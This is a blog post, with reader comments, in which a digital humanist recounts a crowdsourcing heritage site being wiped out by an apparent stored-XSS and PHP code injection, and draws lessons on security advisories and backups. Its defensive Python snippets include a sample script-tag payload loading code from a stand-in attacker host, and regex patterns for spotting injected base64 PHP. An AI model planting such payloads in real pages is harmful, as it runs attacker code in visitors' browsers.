How I Lost the Crowd: A Tale of Sorrow and Hope

Yesterday, my HeritageCrowd project website was annihilated. Gone. Kaput. Destroyed. Joined the choir.

It is a dead parrot.

This is what I think happened, what I now know and need to learn, and what I think the wider digital humanities community needs to think about/teach each other.

HeritageCrowd was (may be again, if I can salvage from the wreckage) a project that tried to encourage the crowdsourcing of local cultural heritage knowledge for a community that does not have particularly good internet access or penetration. It was built on the Ushahidi platform, which allows folks to participate via cell phone text messages. We even had it set up so that a person could leave a voice message and software would automatically transcribe the message and submit it via email. It worked fairly well, and we wrote it up for Writing History in the Digital Age. I was looking forward to working more on it this summer.

Problem #1: Poor record keeping of the process of getting things installed, and the decisions taken.

Now, originally, we were using the Crowdmap hosted version of Ushahidi, so we wouldn’t have to worry about things like security, updates, servers, that sort of thing. But… I wanted to customize the look, move the blocks around, and make some other cosmetic changes so that Ushahidi’s genesis in crisis-mapping wouldn’t be quite as evident. When you repurpose software meant for one domain to another, it’s the sort of thing you do. So, I set up a new domain, got some server space, downloaded Ushahidi and installed it. The installation tested my server skills. Unlike setting up WordPress or Omeka (which I’ve done several times), Ushahidi requires the concomitant set up of ‘Kohana’. This was not easy. There are many levels of tacit knowledge in computing and especially in web-based applications that I, as an outsider, have not yet learned. It takes a lot of trial and error, and sometimes, just dumb luck. I kept poor records of this period – I was working to a tight deadline, and I wanted to just get the damned thing working. Today, I have no idea what I actually did to get Kohana and Ushahidi playing nice with one another. I think it actually boiled down to file structure.

(It’s funny to think of myself as an outsider, when it comes to all this digital work. I am after all an official, card-carrying ‘digital humanist’. It’s worth remembering what that label actually means. At least one part of it is ‘humanist’. I spent well over a decade learning how to do that part. I’ve only been at the ‘digital’ part since about 2005… and my experience of ‘digital’, at least initially, is in social networks and simulation – things that don’t actually require me to mount materials on the internet. We forget sometimes that there’s more to the digital humanities than building flashy internet-based digital tools. Archaeologists have been using digital methods in their research since the 1960s; Classicists at least that long – and of course Father Busa).

Problem #2: Computers talk to other computers, and persuade them to do things.

I forget where I read it now (it was probably Stephen Ramsay or Geoffrey Rockwell), but digital humanists need to consider artificial intelligence. We do a humanities not just of other humans, but of humans’ creations that engage in their own goal-directed behaviours. As someone who has built a number of agent-based models and simulations, I suppose I shouldn’t have forgotten this. But on the internet, there is a whole netherworld of computers corrupting and enslaving each other, for all sorts of purposes.

HeritageCrowd was destroyed so that one computer could persuade another computer to send spam to gullible humans with erectile dysfunction.

It seems that Ushahidi was vulnerable to ‘Cross-site Request Forgery’ and ‘Cross-site Scripting’ attacks. I think what happened to HeritageCrowd was an instance of persistent XSS:

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.
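To make “proper HTML escaping” concrete, here is a minimal sketch. It is written in Python purely for illustration (Ushahidi itself is PHP, and this is not its code); the function name `render_comment` and the example URL are hypothetical. The idea is simply that anything a visitor submitted gets escaped before it is placed into a page that other visitors will load.

```python
import html


def render_comment(author: str, body: str) -> str:
    """Return an HTML fragment in which all user-supplied text is escaped."""
    # html.escape turns <, >, & and (with quote=True) quote characters into
    # entities, so the browser displays the text instead of interpreting it.
    safe_author = html.escape(author, quote=True)
    safe_body = html.escape(body, quote=True)
    return f"<p><strong>{safe_author}</strong>: {safe_body}</p>"


if __name__ == "__main__":
    # A stored-XSS style submission: without escaping, every later visitor
    # would load the attacker's script.
    attack = '<script src="http://evil.example/x.js"></script>'
    print(render_comment("visitor", attack))
```

Escaping on output is only one layer; it does nothing about request forgery, which needs its own defences.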

When I examine every PHP file on the site, there is all sorts of injected base64 code. So this is what killed my site. Once my site started flooding spam all over the place, the internet’s immune systems (my host’s own, and others) shut it all down. Now, I could just clean everything out and reinstall, but there is a more devastating issue: it appears my SQL database is gone. Destroyed. Erased. No longer present. I’ve asked my host to help confirm that, because at this point, I’m way out of my league. Hey all you lone digital humanists: how often does your computing services department help you out in this regard? Find someone at your institution who can handle this kind of thing. We can’t wear every hat. I’ve been a one-man band for so long, I’m a bit like the guy in Shawshank Redemption who asks his boss at the supermarket for permission to go to the bathroom. Old habits are hard to break.
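For anyone wanting to check their own installation for the kind of injected base64 code described above, something like the following rough sketch might be a starting point. It is Python, and the patterns are my own heuristic guesses at what injected PHP tends to look like, not an authoritative signature list; the function name `find_suspicious_php` is hypothetical. A clean result proves nothing, and a hit only means “look at this file by hand”.

```python
import re
from pathlib import Path

# Heuristic patterns (assumptions, not exhaustive): eval() wrapped around a
# decoder call, or base64_decode() applied to a very long string literal.
SUSPICIOUS = re.compile(
    rb"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("
    rb"|base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{200,}['\"]"
)


def find_suspicious_php(root):
    """Return a sorted list of .php files under root that match a pattern."""
    hits = []
    for path in Path(root).rglob("*.php"):
        try:
            data = path.read_bytes()
        except OSError:
            # Unreadable file: skip it rather than abort the whole scan.
            continue
        if SUSPICIOUS.search(data):
            hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    import sys

    # Usage: python scan.py /path/to/site
    for hit in find_suspicious_php(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(hit)
```

Legitimate code sometimes uses `base64_decode` too, so expect false positives; the point is to narrow down which files to read.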

Problem #3: Security Warnings

There are many Ushahidi installations all over the world, and they deal with some pretty sensitive stuff. Security is therefore something Ushahidi takes seriously. I should’ve too. I was not subscribed to the Ushahidi Security Advisories. The hardest pill to swallow is when you know it’s your own damned fault. The warning was there; heed the warnings! Schedule time into every week to keep on top of security. If you’ve got a team, task someone to look after this. I have lots of excuses – it was end of term, things were due, meetings to be held, grades to get in – but it was my responsibility. And I dropped the ball.

Problem #4: Backups

This is the most embarrassing to admit. I did not back things up regularly. I am not ever making that mistake again. Over on Looted Heritage, I have an IFTTT recipe set up that sends every new report to BufferApp, which then tweets it. I’ve also got one that sends every report to Evernote. There are probably more elegant ways to do this. But the worst would be to remind myself to manually download things. That didn’t work the first time. It ain’t gonna work the next.
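One of those more elegant ways might be a small script run on a schedule (cron, say) rather than from memory. The sketch below is Python and only covers the site’s files: it writes a timestamped archive of a directory and keeps the newest few. The function name `backup_directory` and the `keep=7` default are my own assumptions, and the database is not included; that would need a separate dump with whatever tool your database provides.

```python
import shutil
import time
from pathlib import Path


def backup_directory(source, dest_dir, keep=7):
    """Archive `source` as a timestamped .tar.gz in `dest_dir`.

    Only the newest `keep` archives of this source are retained.
    `dest_dir` should live outside `source` (ideally on another machine).
    """
    if keep < 1:
        raise ValueError("keep must be at least 1")
    source = Path(source).resolve()
    dest_dir = Path(dest_dir)
    dest_dir.mkdir(parents=True, exist_ok=True)

    # A sortable timestamp means alphabetical order is chronological order.
    stamp = time.strftime("%Y%m%d-%H%M%S")
    base = dest_dir / f"{source.name}-{stamp}"
    archive = Path(
        shutil.make_archive(
            str(base), "gztar", root_dir=source.parent, base_dir=source.name
        )
    )

    # Prune everything except the newest `keep` archives.
    archives = sorted(dest_dir.glob(f"{source.name}-*.tar.gz"))
    for old in archives[:-keep]:
        old.unlink()
    return archive
```

A backup that sits on the same server as the site would have been wiped along with it, so the archive needs to be copied somewhere else as well.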

So what do I do now?

If I can get my database back, I’ll clean everything out and reinstall, and then progress onwards wiser for the experience. If I can’t… well, perhaps that’s the end of HeritageCrowd. It was always an experiment, and as Scott Weingart reminds us,

The best we can do is not as much as we can, but as much as we need. There is a point of diminishing return for data collection; that point at which you can’t measure the coastline fast enough before the tides change it. We as humanists have to become comfortable with incompleteness and imperfection, and trust that in aggregate those data can still tell us something, even if they can’t reveal everything.

The HeritageCrowd project taught me quite a lot about crowdsourcing cultural heritage, about building communities, about the problems, potentials, and perils of data management. Even in its (quite probable) death, I’ve learned some hard lessons. I share them here so that you don’t have to make the same mistakes. Make new ones! Share them! The next time I go to THATCamp, I know what I’ll be proposing. I want a session on the Black Hats, and the dark side of the force. I want to know what the resources are for learning how they work, what I can do to protect myself, and frankly, more about the social and cultural anthropology of their world. Perhaps there is space in the Digital Humanities for that.

PS.

When I discovered what had happened, I tweeted about it. Thank you to everyone who responded with help and advice. That’s the final lesson, I think, of this episode. Don’t be afraid to share your failures, and ask for help. As Bethany wrote some time ago, we’re at that point where we’re building the new ways of knowing for the future, just like the Lunaticks in the 18th century. Embrace your inner Lunatick:

Those 18th-century Lunaticks weren’t about the really big theories and breakthroughs – instead, their heroic work was to codify knowledge, found professional societies and journals, and build all the enabling infrastructure that benefited a succeeding generation of scholars and scientists.

[...]

if you agree with me that there’s something remarkable about a generation of trained scholars ready to subsume themselves in collaborative endeavors, to do the grunt work, and to step back from the podium into roles only they can play – that is, to become systems-builders for the humanities — then we might also just pause to appreciate and celebrate, and to use “#alt-ac” as a safe place for people to say, “I’m a Lunatick, too.”

Perhaps my role is to fail gloriously & often, so you don’t have to. I’m ok with that.

18 thoughts on “How I Lost the Crowd: A Tale of Sorrow and Hope”

  1. While it’s absolutely terrible that this happened, this post almost makes it worth it (to the rest of us, at least, somehow for you I think not). As these kinds of projects become more popular, they become more attractive targets for hacking (problematic word, I know, how about “More hack, less hacking?”). I hope you get everything back together.

    • Thanks Elijah! As I look at the database, it looks more or less uncorrupted, so perhaps we’ll be back in business soon.

  2. Shawn, I’m sorry to hear that you’re going through this hassle, but you can count me (someone who should know better!) among those of your readers who were reminded by this to put Something Pretty Important under version control. So, thanks, from one Lunatick to another. I greatly admire the way you have turned a set-back into a positive set of lessons for the broader community. Here’s hoping that HeritageCrowd is “not dead yet.”

    • Thank you Bethany. Some hard lessons, but *next* time… right? :) Version control is something else I need to get to grips with too. So many things to learn!

    • Hi Heather,
      Thank you – I’ve been in touch with one of your developers, so hopefully everything will be back up and running before too much longer.

  3. I’m sorry to hear about your loss, especially considering that the article in Writing History in the Digital Age is helping inform my own MRP work. I hope HeritageCrowd is brought back to life because it is a fantastic idea that is inspiring other projects. “Gentlemen, we can rebuild him. We have the technology.”

    • Hi Robertss87 – thank you. And thank you for the 6 million dollar man reference! I’m glad the case study was helpful for your own work. That’s what it’s all about, right? Looks like my database survived mostly unscathed, so I’m using this time to think carefully about what I want HeritageCrowd 2.0 to do/accomplish/be.

